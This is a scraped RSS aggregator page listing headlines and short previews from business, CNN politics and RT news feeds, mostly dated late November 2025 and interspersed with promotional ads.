Gustas Germanavicius, one of Lithuania's top Ironmen at 27 years old, told Fortune about what he learned on his trip to China: "practice makes tired."

Article link

Date of publish: Thu, 27 Nov 2025 11:00:00 +0000

Read Warren Buffett’s annual Thanksgiving letter for 2025—his final one to shareholders

The 95-year-old Oracle of Omaha is stepping back from Berkshire Hathaway and ending his legendary annual shareholder letters.

Article link

Date of publish: Thu, 27 Nov 2025 17:48:32 +0000

Business

All News

BLACK FRIDAY IS LIVE - Lock in InvestingPro for THE LOWEST PRICE OF THE YEAR NOW

Article link

Date of publish: 2025-11-27 19:04:10

BofA outlines key investment themes to watch out for in 2026

Article link

Date of publish: 2025-11-27 14:19:25

Here’s why Deutsche Bank expects the dollar to weaken further next year

Article link

Date of publish: 2025-11-27 14:07:51

Why today’s market wobble isn’t the start of a crash

Article link

Date of publish: 2025-11-27 14:05:04

Morgan Stanley downgrades Elisa, cuts PT amid slowing mobile growth, rising churn

Article link

Date of publish: 2025-11-27 12:08:26

Gold prices cool after surging on rate cut cheer, Fed Chair speculation

Article link

Date of publish: 2025-11-27 11:43:05

SSE cut to “neutral” as UBS warns share gains have priced in growth expectations

Article link

Date of publish: 2025-11-27 11:33:21

Bitcoin price today: rebounds above $91k as Fed cut bets gain steam

Article link

Date of publish: 2025-11-27 11:27:09

UBS downgrades Prada while upgrading EssilorLuxottica on diverging growth outlooks

Article link

Date of publish: 2025-11-27 11:08:16

Oil prices subdued as analysts expect thin Thanksgiving trading

Article link

Date of publish: 2025-11-27 10:45:01

Ferrari Group revenue up 3.5% in Q3 as organic growth accelerates

Article link

Date of publish: 2025-11-27 10:29:36

U.S. dollar faces biggest weekly drop since July as investors eye Fed rate path

Article link

Date of publish: 2025-11-27 10:21:49

Norsk Hydro cuts long-term EBITDA targets; stock down

Article link

Date of publish: 2025-11-27 09:59:27

European stock markets muted amid Fed rate cut hopes

Article link

Date of publish: 2025-11-27 09:33:59

Serica Energy cuts FY25 production guidance, shares fall over 2%

Article link

Date of publish: 2025-11-27 09:29:10

Pennon first-half slightly misses estimates but keeps full-year guidance

Article link

Date of publish: 2025-11-27 08:58:20

Asian stocks rise; U.S. job market fears; Bitcoin climbs - what’s moving markets

Article link

Date of publish: 2025-11-27 08:45:24

Sika reaffirms targets, outlines CHF100 mln charges and 2028 savings plan

Article link

Date of publish: 2025-11-27 08:39:31

Halfords lifts revenue and margins in first half, keeps full-year guidance

Article link

Date of publish: 2025-11-27 08:08:33

Rémy Cointreau H1 EBIT falls 13.6% despite net income beat

Article link

Date of publish: 2025-11-27 08:00:03

Boohoo shares surge 24% as loss narrows to £3.4 mln; Debenhams GMV up 20%

Article link

Date of publish: 2025-11-27 07:40:25

China Taiping shares slide on fears of large claims from Hong Kong fire

Article link

Date of publish: 2025-11-27 05:59:56

Toyota Oct production rises, sales buoyed by US demand

Article link

Date of publish: 2025-11-27 05:55:44

LOWEST PRICE OF THE YEAR - lock InvestingPro for up to 60% off on Black Friday NOW

Article link

Date of publish: 2025-11-27 05:03:33

Alibaba, Baidu, BYD shares fall on report of potential Chinese military ties

Article link

Date of publish: 2025-11-27 04:10:30

China property stocks fall as Vanke debt restructuring jitters grow

Article link

Date of publish: 2025-11-27 03:54:27

Asahi Group says data of 1.5 mln customers may have leaked in cyberattack

Article link

Date of publish: 2025-11-27 03:41:00

Puma shares surge 13% on report ANTA weighs potential takeover bid

Article link

Date of publish: 2025-11-27 03:35:07

ServiceNow nears deal to acquire Veza for at least $1 bln - The Information

Article link

Date of publish: 2025-11-27 02:49:57

Asia stocks rise tracking Wall St; China property jitters, stimulus in focus

Article link

Date of publish: 2025-11-27 02:46:16

S.Korea launches working group for AI plan involving Nvidia GPUs- Yonhap

Article link

Date of publish: 2025-11-27 01:41:58

Wall St futures stay upbeat amid tech recovery, rate cut bets

Article link

Date of publish: 2025-11-27 01:00:38

BofA hikes Japan’s GDP estimates, sees gradual BOJ tightening

Article link

Date of publish: 2025-11-27 00:20:23

Japan, US considering public-private memory chip plant- report

Article link

Date of publish: 2025-11-26 23:45:49

Stock market today: S&P 500 jumps as AI momentum returns ahead of Thanksgiving

Article link

Date of publish: 2025-11-26 21:26:53

TSX higher amid Fed rate cut hopes

Article link

Date of publish: 2025-11-26 21:10:06

Two National Guard members shot near White House

Article link

Date of publish: 2025-11-26 20:55:48

Canada to boost support for steel and lumber industries amid tariffs

Article link

Date of publish: 2025-11-26 20:21:38

US economy ’little changed,’ but labor demand softens on early signs of AI impact

Article link

Date of publish: 2025-11-26 19:24:13

Alibaba, BYD, Baidu trade lower on Pentagon’s China military ties report

Article link

Date of publish: 2025-11-26 18:38:33

Cannabis stocks rise as US Medicare reportedly considers CBD coverage

Article link

Date of publish: 2025-11-26 18:12:17

Volkswagen faces pressure-driven reset in 2026 after a difficult year

Article link

Date of publish: 2025-11-26 17:25:13

Blackstone nears $4 billion acquisition of MacLean Power Systems, Bloomberg says

Article link

Date of publish: 2025-11-26 17:18:58

Cruise pricing weakened in November, says Bernstein

Article link

Date of publish: 2025-11-26 17:06:55

Citi bullish on TDS and Array Digital as divestitures free up cash for fiber

Article link

Date of publish: 2025-11-26 16:41:26

Bernstein downgrades Ambev as dividend hopes and soft demand lift near term risks

Article link

Date of publish: 2025-11-26 16:02:44

Rio Tinto reportedly mulling up to $2B sale of US boron assets

Article link

Date of publish: 2025-11-26 16:02:09

Macquarie says AI isn’t a bubble as demand still far outstrips supply

Article link

Date of publish: 2025-11-26 15:46:15

50% annual return? This strategy makes it possible

Article link

Date of publish: 2025-11-26 15:44:00

Drug prices: RJ says Trump's first try more aggressive than Biden's

Article link

Date of publish: 2025-11-26 15:25:13

OpenAI’s long term compute commitments exceed projected cash flows

Article link

Date of publish: 2025-11-26 15:23:40

Oracle shares jump as analysts argue bearish fears are overdone

Article link

Date of publish: 2025-11-26 14:43:39

Bitcoin price today: muted at $87.6k with focus on rate cut bets, Fed reshuffle

Article link

Date of publish: 2025-11-26 14:42:13

Buy the post-earnings pullback in this Magnificent 7 stock, says JPMorgan

Article link

Date of publish: 2025-11-26 14:39:33

Nvidia shares rebound after doubts over chip giant’s AI dominance hit stock

Article link

Date of publish: 2025-11-26 14:36:42

Oscar Health upgraded on potential earnings recovery despite subsidy risk

Article link

Date of publish: 2025-11-26 14:00:55

Deutsche Bank dissects the U.K. Autumn Budget

Article link

Date of publish: 2025-11-26 13:50:35

Global stock market outlook for 2026: UBS sets MSCI ACWI price target

Article link

Date of publish: 2025-11-26 13:37:55

Gold prices outlook for 2026: Deutsche Bank sets new target

Article link

Date of publish: 2025-11-26 13:34:47

Rachel Reeves delivers £26bn tax package, pushing U.K. burden to record levels

Article link

Date of publish: 2025-11-26 13:34:37

China reportedly bans ByteDance from using Nvidia chips in new data centers

Article link

Date of publish: 2025-11-26 13:33:36

Autodesk upgrade follows clean quarter lifting confidence in long-term growth

Article link

Date of publish: 2025-11-26 13:31:46

16%+ in a single month — These high-conviction Israeli picks cannot be overlooked

Article link

Date of publish: 2025-11-26 13:15:44

U.S. consumers in a "relatively strong position" - Yardeni Research

Article link

Date of publish: 2025-11-26 13:08:12

Gold prices rise; weak U.S. data fuels Dec rate cut hopes

Article link

Date of publish: 2025-11-26 12:56:22

Bank of America turns cautious on U.S. stocks, sees ‘modest returns’ in 2026

Article link

Date of publish: 2025-11-26 12:51:45

Barclays cuts eDreams to “equal weight,” slashes price target by 63% after warning

Article link

Date of publish: 2025-11-26 12:34:27

Italian antitrust watchdog widens probe into Meta over WhatsApp AI tools

Article link

Date of publish: 2025-11-26 12:32:22

S&P 500 could hit 8,000 in 2026 on more easing from Fed: JPMorgan

Article link

Date of publish: 2025-11-26 12:19:40

Deutsche Bank updates ratings, lifts targets across EU steel sector

Article link

Date of publish: 2025-11-26 12:19:38

Dell, Urban Outfitters and Autodesk rise premarket; Deere and HP fall

Article link

Date of publish: 2025-11-26 12:08:01

141%+: Get the AI picks that beat the S&P 500 by 100%+ for LOWEST PRICE OF 2025

Article link

Date of publish: 2025-11-26 12:00:38

L’Oréal upgraded as Luxe outperformance expected to continue, stock up

Article link

Date of publish: 2025-11-26 11:48:16

Stocks are in the pullback mode. Here’s how hedge funds are reacting

Article link

Date of publish: 2025-11-26 11:47:20

Barclays downgrades Colruyt citing persistent market pressures in Belgium

Article link

Date of publish: 2025-11-26 11:41:53

Deere shares tumble despite Q4 earnings beat as tariffs weigh on margins

Article link

Date of publish: 2025-11-26 11:40:34

Deutsche Bank raises 2026 copper price forecast amid supply squeeze

Article link

Date of publish: 2025-11-26 11:14:30

Chinese stocks likely to see volatility in coming months - BCA Research

Article link

Date of publish: 2025-11-26 10:58:32

DHL raised to Neutral at UBS amid signs of improvement in the peak season

Article link

Date of publish: 2025-11-26 10:44:23

JPM ups Carlsberg, cuts Henkel; Pernod, Givaudan on negative catalyst watch

Article link

Date of publish: 2025-11-26 10:38:31

ASML stock rises as Morgan Stanley names it ’Top Pick’

Article link

Date of publish: 2025-11-26 10:20:01

Goldman Sachs lifts Thyssenkrupp Nucera to “neutral” after sharp guidance reset

Article link

Date of publish: 2025-11-26 10:12:42

Kevin Hassett would try to cut rates "well below 3%" as Fed Chair - BofA

Article link

Date of publish: 2025-11-26 10:06:51

HBX dips as Q3 revenue misses and guidance flags softer growth

Article link

Date of publish: 2025-11-26 09:50:13

UBS cuts Shell to “neutral,” warns stock ‘no longer cheap’ after strong rally

Article link

Date of publish: 2025-11-26 09:42:53

EHang Q3 revenue falls as company maintains full-year guidance

Article link

Date of publish: 2025-11-26 09:32:14

Significant pullback in European defense offers a buying opportunity:BofA

Article link

Date of publish: 2025-11-26 09:25:43

Dell shares rise as strong AI server demand fuels upbeat financial guidance

Article link

Date of publish: 2025-11-26 09:21:20

Oil prices stabilize after Ukraine peace deal-inspired losses

Article link

Date of publish: 2025-11-26 09:19:07

Li Auto dips as third-quarter earnings, outlook fall short of forecasts

Article link

Date of publish: 2025-11-26 09:17:10

UBS upgrades Neste to “buy,” citing stronger margins and tighter renewable diesel

Article link

Date of publish: 2025-11-26 09:03:46

UBS lifts Eni to Buy on ’highest quality spending’, shares up

Article link

Date of publish: 2025-11-26 09:02:19

Dollar bounces after hefty losses; sterling awaits budget announcement

Article link

Date of publish: 2025-11-26 08:55:47

Splintering AI trade; Dell’s forecast; Deere to report - what’s moving markets

Article link

Date of publish: 2025-11-26 08:51:22

Elekta shares jump 11% after Q2 margin beat despite weak orders

Article link

Date of publish: 2025-11-26 08:35:53

Adecco confirms 3-6% EBITA margin, targets 1.5x leverage by 2027

Article link

Date of publish: 2025-11-26 08:11:12

European stocks rally on Fed rate cut optimism; U.K. budget in spotlight

Article link

Date of publish: 2025-11-26 08:03:10

Pets at Home retail profit plunges 84% as group earnings drop

Article link

Date of publish: 2025-11-26 07:52:06

BofA: Hedge funds, institutional clients bought the dip last week; Tech flows sank

Article link

Date of publish: 2025-11-26 07:34:10

FDA approves AstraZeneca’s Imfinzi for early-stage stomach and GEJ cancers

Article link

Date of publish: 2025-11-26 07:25:49

China Vanke shares slide on renewed debt jitters

Article link

Date of publish: 2025-11-26 06:57:24

Musk says Tesla robotaxi fleet in Austin to double next month

Article link

Date of publish: 2025-11-26 06:41:32

Otsuka shares surge on accelerated FDA approval for kidney drug Voyxact

Article link

Date of publish: 2025-11-26 05:28:14

Asia FX steady as Fed cut bets rise; Aussie gains on hot CPI, Kiwi jumps post RBNZ

Article link

Date of publish: 2025-11-26 04:54:57

Robinhood pushes further into prediction markets with Susquehanna tie-up

Article link

Date of publish: 2025-11-26 03:57:49

FAA investigates Amazon over drone mishap in Texas, CNBC reports

Article link

Date of publish: 2025-11-26 03:54:47

Japanese chipmaker Kioxia slides as Bain plans $2 bln share sale

Article link

Date of publish: 2025-11-26 03:09:05

Asia stocks surge as tech extends rebound, Dec rate cut bets grow

Article link

Date of publish: 2025-11-26 02:50:45

OpenAI sees at least 220 mln users paying for ChatGPT by 2030- The Information

Article link

Date of publish: 2025-11-26 01:41:34

RBNZ cuts interest rates by 25 bps as growth stalls, inflation moderates

Article link

Date of publish: 2025-11-26 01:16:32

Australia CPI inflation rises more than expected in Oct, dulls RBA rate cut bets

Article link

Date of publish: 2025-11-26 00:47:05

NIO: Macquarie downgrades rating, cuts PT on weak Onvo demand, policy risks

Article link

Date of publish: 2025-11-26 00:16:45

Morgan Stanley downgrades Nvidia supplier Ibiden, upgrades Murata Manufacturing

Article link

Date of publish: 2025-11-25 23:46:33

Politics RSS

Political sites below.

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

RT - Daily news

Why China’s warning matters more than any UN reform debate

Preview Beijing revives an uncomfortable truth: the global order belongs to the winners of WW2
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 21:23:13 +0000

US peace roadmap, Kiev regime illegitimate, European security: Key takeaways from Putin’s press conference

Preview Russian President Vladimir Putin has reiterated Moscow’s position on the US-proposed peace plan aimed at ending the Ukraine conflict
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 21:14:49 +0000

Putin names key holdup in Ukraine peace process

Preview Conflicting approaches within the West are stalling the Ukraine peace process, Russian President Vladimir Putin has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 21:02:40 +0000

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

The Axe Files with David Axelrod

Go beyond the soundbites and get to know some of the most interesting players in politics.

Article link

Margins of Error

Look closely at almost anything and you'll find data—lots of it. But what are those numbers really saying about who we are and what we believe? Harry Enten is on a mission to find out.

Article link

The notable legal clouds that continue to hang over Donald Trump

All eyes are on former President Donald Trump, who has launched another White House bid.

Article link

Date of publish: Thu, 08 Dec 2022 03:36:24 GMT

The fine print of the Respect for Marriage Act

Let's start with the positive: Republicans and Democrats are coming together to protect same-sex marriage from the Supreme Court.

Article link

Date of publish: Tue, 29 Nov 2022 23:32:13 GMT

Everything you need to know about Biden's student loan forgiveness program

President Joe Biden's federal student loan forgiveness program, which promises to deliver up to $20,000 of debt relief for millions of borrowers, is on hold indefinitely as legal challenges work their way through the courts.

Article link

Date of publish: Tue, 13 Jun 2023 20:58:58 GMT

Politics of the Day

Politics of the Day

Article link

Date of publish: Fri, 14 Jun 2024 04:13:26 GMT

0% intro APR until 2024 is 100% insane
It's official: now avoid credit card interest into 2024
Experts: this is the best cash back card of 2022
Turn Your Rising Home Equity Into Cash You Can Use
Dream Big with a Home Equity Loan
Want Cash Out of Your Home? Here Are Your Best Options
Use the Right Card for Holiday Gifts (Save Hundreds on Interest)
10 Cards Charging 0% Interest Until 2024
Get a $200 Cash Back Bonus on Holiday Gift Buying
Array

Vice President Kamala Harris, a former US senator from California who previously served as the state's attorney general, could be the first Black woman and Asian American to lead a major party ticket after receiving President Joe Biden's support to become the next Democratic presidential nominee.

Article link

Array

Fareed explains why AI's massive energy demands are straining the power grid, but also why AI could enable big breakthroughs in sustainability and clean energy.

Article link

Array

In the wake of the Republican National Convention earlier this month, Fareed speaks with historian Niall Ferguson about how and why the modern-day GOP has changed since the Reagan era of the 1980s.

Article link

Array

Fareed speaks with New York Times opinion columnist Ezra Klein about the significance of Vice President Kamala Harris' early career as a prosecutor — and how it may affect her campaign.

Article link

Array

New York Times opinion columnist Ezra Klein speaks with Fareed about the effects of President Joe Biden's decision to not seek reelection — and whether Vice President Kamala Harris can reshape the race.

Article link

Array

CNN Senior Political Commentator Scott Jennings and Political Commentators Kristen Soltis Anderson, Jamal Simmons and Kate Bedingfield tell CNN's Jake Tapper who they think should join Vice President Kamala Harris' ticket and with 100 days until election day, the state of the 2024 presidential race.

Article link

Array

On CNN's State of the Union, Republican Sen. Tom Cotton criticizes Harris' comments on the war in Gaza and calls her a "San Francisco liberal who cannot keep this country safe."

Article link

Array

Years before he became president, many Americans first met Barack Obama during the 2004 Democratic National Convention.

Article link

Array

Joe Biden, the 46th president of the United States, announced on Sunday, July 21, that he is not seeking reelection.

Article link

Array

Fareed is joined by Jane Gilbert, chief heat officer for Miami-Dade County, Fla., who discusses how she is working to combat the effects of record high temperatures in a county that is considered ground zero for the climate crisis in the United States.

Article link

Array

Fareed speaks with David Frum, staff writer at The Atlantic, about how Sen. JD Vance went from being a fierce critic of Donald Trump to becoming the former president's running mate.

Article link

Array

Colorado Gov. Jared Polis tells CNN's Jake Tapper that Biden needs to show Democrats that he can turn his campaign around and says "he hasn't done that yet."

Article link

RT - Daily news

Why China’s warning matters more than any UN reform debate

Preview Beijing revives an uncomfortable truth: the global order belongs to the winners of WW2
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 21:23:13 +0000

US peace roadmap, Kiev regime illegitimate, European security: Key takeaways from Putin’s press conference

Preview Russian President Vladimir Putin has reiterated Moscow’s position on the US-proposed peace plan aimed at ending the Ukraine conflict
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 21:14:49 +0000

Putin names key holdup in Ukraine peace process

Preview Conflicting approaches within the West are stalling the Ukraine peace process, Russian President Vladimir Putin has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 21:02:40 +0000

Putin restates condition for ending hostilities with Ukraine

Preview Ukraine must withdraw its troops from the parts of Russian territory it claims as its own before any ceasefire, President Putin said
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 20:42:36 +0000

Witkoff critics ‘want to steal money together with Kiev’ – Putin

Preview Russian President Vladimir Putin has said attacks on US special envoy Steve Witkoff are aimed to keep the Ukraine conflict going
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 19:10:14 +0000

US intel ‘likely’ behind alleged Witkoff leak – Guardian

Preview An anti-Trump US intelligence figure may have leaked confidential Ukraine-related call records, the Guardian has reported
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 19:09:54 +0000

Vatican warns against polygamy

Preview The Vatican has emphasized the value of monogamous marriage between a man and a woman in a document approved by the Pope
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 18:35:40 +0000

EU state considering dismantling rail tracks to Russia – media

Preview Latvia is considering removing sections of railway line leading into Russia, citing border security
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 18:27:07 +0000

Kiev’s frontline forces in danger of collapsing – Putin

Preview Ukrainian defensive lines in Zaporozhye Region are being stretched by a rapid Russian advance, Vladimir Putin says
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 18:09:44 +0000

US to pressure allies on mass migration – NYT

Preview The US State Department has told overseas missions to report on migrant-linked crime and evaluate the responses of their host governments
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 17:17:51 +0000

Trump is the ultimate political pragmatist

Preview Whatever happens to the Ukraine peace plan, the US president has secured several key victories for himself
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 16:18:48 +0000

South Africa receives backing after US G20 threat

Preview The FW de Klerk Foundation has said South Africa must not be bullied out of global forums, including the G20
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 14:38:41 +0000

Euroclear issues stark warning to EU over Russian assets plot – FT

Preview Brussels attempts to use sovereign Russian assets to fund Kiev’s war-chest could spike the EU’s borrowing costs and damage its reputation
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 14:33:02 +0000

‘Legally impossible’ to sign peace treaty with Ukraine now – Putin

Preview It is “legally impossible” to sign a peace treaty with Ukraine at present, Russian President Vladimir Putin has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 14:22:48 +0000

Nigerian president declares emergency as attacks surge

Preview The Nigerian president has announced a national security emergency following a wave of deadly attacks and mass kidnappings of schoolchildren
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 14:05:56 +0000

Russia ready to provide Europe with written security guarantees – Putin

Preview Moscow has no aggressive intentions and is ready to put that commitment in writing, the president has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 14:02:35 +0000

Olympic sport federation allows Russians to compete under own flag

Preview The judo governing body has restored full representation for Russians, becoming the first to cancel Ukraine-related restrictions
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 13:53:33 +0000

Here’s why India is rushing to acquire more Russian missiles

Preview New Delhi sees Russian missile technology as key to maintaining an airpower balance with its neighbors
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 13:50:50 +0000

No draft of Ukraine peace deal yet – Putin

Preview There isn’t a draft Ukraine peace agreement, only a range of issues outlined to discuss, the Russian President Vladimir Putin has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 13:43:03 +0000

Guinea-Bissau general sworn as new leader after coup – media

Preview Guinea-Bissau’s army has reportedly sworn in General Horta Nta Na Man as the country’s interim leader after Wednesday’s coup
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 13:40:06 +0000

Zelensky sent aide to US talks to ‘protect’ him from corruption probe – media

Preview Vladimir Zelensky reportedly sent chief of staff Andrey Yermak to the Geneva talks with the US amid growing graft scrutiny
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 13:30:45 +0000

WATCH exclusive RT footage as Russia advances beyond Donbass

Preview RT’s Murad Gadziev has visited a location near the village of Novopavlovka in Ukraine’s Dnepropetrovsk Region
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 12:51:28 +0000

Tax burden rises for Brits as govt pursues military buildup

Preview The new budget will mean “ordinary” Brits pay more tax but the government will continue to increase military spending, the chancellor said
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 12:33:20 +0000

West gearing up for war – key Russian ally

Preview Belarusian President Alexander Lukashenko has accused Western nations of pursuing militaristic, trust-destroying policies
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 10:49:03 +0000

Baltic nations want EU bailout after Russia sanctions backfire – Politico

Preview Tourism, investment, and cross-border trade have plunged across the Baltic states due to EU sanctions on Moscow, the outlet has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 10:48:27 +0000

Ethiopia reports six deaths as virus spreads

Preview Ethiopia has confirmed six deaths from Marburg virus disease as health officials intensify containment measures
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 10:39:15 +0000

Putin offers battle-tested Russian arms to regional security alliance

Preview President Vladimir Putin has proposed supplying CSTO members with Russian weapons proven in combat
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 10:05:01 +0000

African nation not ‘worthy’ of membership ‘anywhere’ – Trump

Preview US President Donald Trump has announced a halt to all payments and subsidies to South Africa amid escalating diplomatic tensions
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 09:29:40 +0000

US warned Europeans about danger of dragging out Ukraine conflict – NYT

Preview US Army Secretary Dan Driscoll reportedly told European diplomats that Russia’s ability to produce long-range missiles is only increasing
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 09:04:42 +0000

US wants Ukraine peace deal before security guarantees – Politico

Preview Washington wants Kiev to sign a peace deal before it agrees to any security guarantees, Politico reports, citing Marco Rubio
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 08:54:27 +0000

Russia and India to work on linking national payment systems – Moscow

Preview The link-up of Mir and RuPay is likely to feature in the agenda when Russian President Vladimir Putin visits India in December
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 08:33:38 +0000

New Delhi and Beijing clash over detention of Indian citizen

Preview India has protested what it calls China’s “arbitrary actions” in detaining a woman born in a state claimed by Beijing
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 07:11:18 +0000

US freezes immigration requests from Afghanistan in response to DC attack

Preview The US has suspended the processing of immigration requests from Afghanistan in response to the shooting in DC
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 03:45:47 +0000

Putin plays traditional Kyrgyz lute in Bishkek (VIDEO)

Preview Russian President Vladimir Putin tried to play a traditional lute during his trip to Kyrgyzstan
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 03:31:40 +0000

Afghan asylum seeker identified as suspect in DC National Guard shooting – media

Preview An Afghan national has reportedly been named as the suspect in the shooting of National Guard members in Washington, DC
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 01:19:27 +0000

US voters’ sympathy for Israel hits historic low – survey

Preview Sympathy for Israel among US voters has fallen to a historic low, a new survey suggests
Read Full Article at RT.com

Article link

Date of publish: Thu, 27 Nov 2025 00:17:45 +0000

Sarkozy loses conviction appeal

Preview France’s Court of Cessation has upheld former President Nicolas Sarkozy’s conviction for illegal campaign financing in 2012
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 21:12:34 +0000

Two National Guard members shot in ambush near White House

Preview A gunman shot two National Guard members just blocks from the White House on Wednesday
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 20:13:08 +0000

Will Trump cave to Zelensky and sink his own peace deal?

Preview Demilitarization and denazification are not just words for Moscow – the West has to recognize this to end the Ukraine war
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 19:36:32 +0000

Gaza in worst economic collapse on record – UN

Preview The Israel-Hamas war has erased decades of growth in Gaza, plunging the enclave into most severe economic crisis on record, the UN has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 19:31:57 +0000

Dozens dead after fire engulfs high-rise block in Hong Kong (VIDEOS)

Preview A massive fire in a Hong Kong apartment block has left at least 44 people dead, while hundreds others are feared trapped
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 18:29:00 +0000

Iskander and Topol launcher designer passes away aged 87

Preview Decorated Russian engineer and missile launcher designer Valerian Sobolev died aged 87 following a lengthy illness
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 17:14:39 +0000

Kremlin aide sees Washington infighting behind leak

Preview Someone in Washington could be plotting against US special envoy Steve Witkoff by leaking his calls, Kremlin aide Yury Ushakov has suggested
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 16:20:11 +0000

Guinea-Bissau shaken by reported ‘coup’ attempt after vote

Preview The president of Guinea-Bissau, Umaro Sissoco Embalo, has reportedly been arrested
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 15:39:54 +0000

Why the G20 both lost and found its way

Preview South Africa’s presidency has been successful, particularly in advancing its own foreign policy goals and the interests of the Global South
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 15:06:21 +0000

Meta turned blind eye to sex trafficking – court filings

Preview Facebook’s parent company, Meta, had a policy allowing 16 sex trafficking violations on its platforms before it suspended users’ accounts
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 15:02:45 +0000

‘World’s Strongest Woman’ stripped of title in transgender scandal

Preview The Official Strongman Games organizers have discovered that US athlete Jammie Booker was born male
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 14:59:19 +0000

South Africa hands over G20 presidency

Preview South Africa transferred the G20 presidency to Washington after a failed summit handoff caused by the absence of senior US officials
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 13:50:12 +0000

Tunisia summons EU ambassador

Preview Tunisia’s president has accused EU envoy Giuseppe Perrone of failing to comply with the rules of diplomatic conduct
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 13:36:36 +0000

Western Europe facing ‘bleak future’ – Mearsheimer to Glenn Diesen (VIDEO)

Preview The Ukraine crisis has fueled regional insecurity and created “huge problems” in EU-US relations, John Mearsheimer has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 12:57:00 +0000

Can anyone end the Ukraine war if Kiev refuses every compromise?

Preview Why every attempt at a Ukraine deal collapses under pressure from Kiev and Brussels
Read Full Article at RT.com

Article link

Date of publish: Wed, 26 Nov 2025 12:54:55 +0000

Zelensky aide looked ‘gutted’ after Trump rejected Kiev’s spin on peace plan – NYP

Preview Vladimir Zelensky’s aide, Andrey Yermak, was reportedly stunned by President Donald Trump’s rejection of Kiev’s ideas for peace with Russia
Read Full Article at RT.com

Article link

